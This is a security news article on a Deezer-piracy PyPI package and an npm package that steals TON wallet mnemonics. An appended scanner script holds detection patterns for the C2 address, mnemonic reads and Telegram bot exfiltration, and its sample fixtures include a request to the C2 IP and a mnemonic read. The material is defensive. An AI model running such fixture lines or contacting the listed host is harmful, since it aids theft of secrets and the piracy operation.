Malicious PyPI Package “automslc” Enables 104K+ Unauthorized Deezer Music Downloads

Feb 26, 2025 | Ravie Lakshmanan | Malware / Cryptocurrency

Cybersecurity researchers have flagged a malicious Python library on the Python Package Index (PyPI) repository that facilitates unauthorized music downloads from the music streaming service Deezer.

The package in question is automslc, which has been downloaded over 104,000 times to date. First published in May 2019, it remains available on PyPI as of writing.

“Although automslc, which has been downloaded over 100,000 times, purports to offer music automation and metadata retrieval, it covertly bypasses Deezer’s access restrictions by embedding hardcoded credentials and communicating with an external command-and-control (C2) server,” Socket security researcher Kirill Boychenko said in a report published today.

Specifically, the package is designed to log into the French music streaming platform via user-supplied and hard-coded credentials, collect track-related metadata, and download full audio files in violation of Deezer’s API terms.

The package also periodically communicates with a remote server located at “54.39.49[.]17:8031” to provide updates on the download status, thereby giving the threat actor centralized control over the coordinated music piracy operation.

Put differently, automslc effectively turns the systems of the package’s users into an illicit network for facilitating bulk music downloads in an unauthorized manner. The IP address is associated with a domain named “automusic[.]win,” which is said to be used by the threat actor to oversee the distributed downloading operation.

“Deezer’s API terms forbid the local or offline storage of full audio content, but by downloading and decrypting entire tracks, automslc bypasses this limitation, potentially placing users at risk of legal repercussions,” Boychenko said.

The disclosure comes as the software supply chain security company detailed a rogue npm package called @ton-wallet/create that has been found stealing mnemonic phrases from unsuspecting users and developers in the TON ecosystem, while impersonating the legitimate @ton/ton package.

The package, first published to the npm registry in August 2024, has attracted 584 downloads to date. It remains available for download.

The malicious functionality embedded into the library is capable of extracting the process.env.MNEMONIC environment variable, thereby giving threat actors full access to a cryptocurrency wallet and potentially draining a victim’s digital assets. The information is transmitted to an attacker-controlled Telegram bot.

“This attack poses severe supply chain security risks, targeting developers and users integrating TON wallets into their applications,” Socket said. “Regular dependency audits and automated scanning tools should be employed to detect anomalous or malicious behaviors in third-party packages before they are integrated into production environments.”
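As an added example of the kind of dependency audit Socket recommends (this is not code from the article, from Socket, or from either package), the script below walks a dependency tree and flags the indicators the article describes: the automslc C2 endpoint and domain, reads of a MNEMONIC environment variable, and calls to the Telegram bot API. The rule names and the two sample source files it scans are constructed for the demonstration.

```python
import re
from pathlib import Path

# Indicators taken from the article: the automslc C2 endpoint and domain, and the
# behaviours attributed to @ton-wallet/create (MNEMONIC read, Telegram bot exfil).
C2_HOST, C2_PORT = "54.39.49.17", "8031"
RULES = {
    "known_c2_endpoint": re.compile(rf"{re.escape(C2_HOST)}(?::{C2_PORT})?"),
    "known_c2_domain": re.compile(r"automusic\.win"),
    "mnemonic_env_read": re.compile(
        r"process\.env\.MNEMONIC|os\.environ(?:\.get\(|\[)\s*['\"]MNEMONIC"),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
}
SOURCE_SUFFIXES = {".py", ".js", ".mjs", ".cjs", ".ts"}


def scan_text(text, origin="<string>"):
    """Return (origin, line_no, rule_name, line) for every matching line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule_name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((origin, line_no, rule_name, line.strip()))
    return hits


def scan_tree(root):
    """Scan every source file under root (e.g. node_modules or site-packages)."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in SOURCE_SUFFIXES:
            hits.extend(scan_text(path.read_text(errors="replace"), str(path)))
    return hits


# Constructed fixtures standing in for files an audit might encounter.
SAMPLE_JS = """\
const seed = process.env.MNEMONIC;
const url = "https://api.telegram.org/bot" + token + "/sendMessage";
"""
SAMPLE_PY = """\
import requests
requests.post("http://54.39.49.17:8031/status", json={"done": count})
"""

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_JS, "sample.js") + scan_text(SAMPLE_PY, "sample.py"):
        print("%s:%d [%s] %s" % hit)
```

Point `scan_tree()` at a project's `node_modules` or a virtualenv's `site-packages` to audit real dependencies; any hit on `known_c2_endpoint` or `known_c2_domain` is a direct match on the article's indicators, while the other two rules are behavioural and need manual review.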
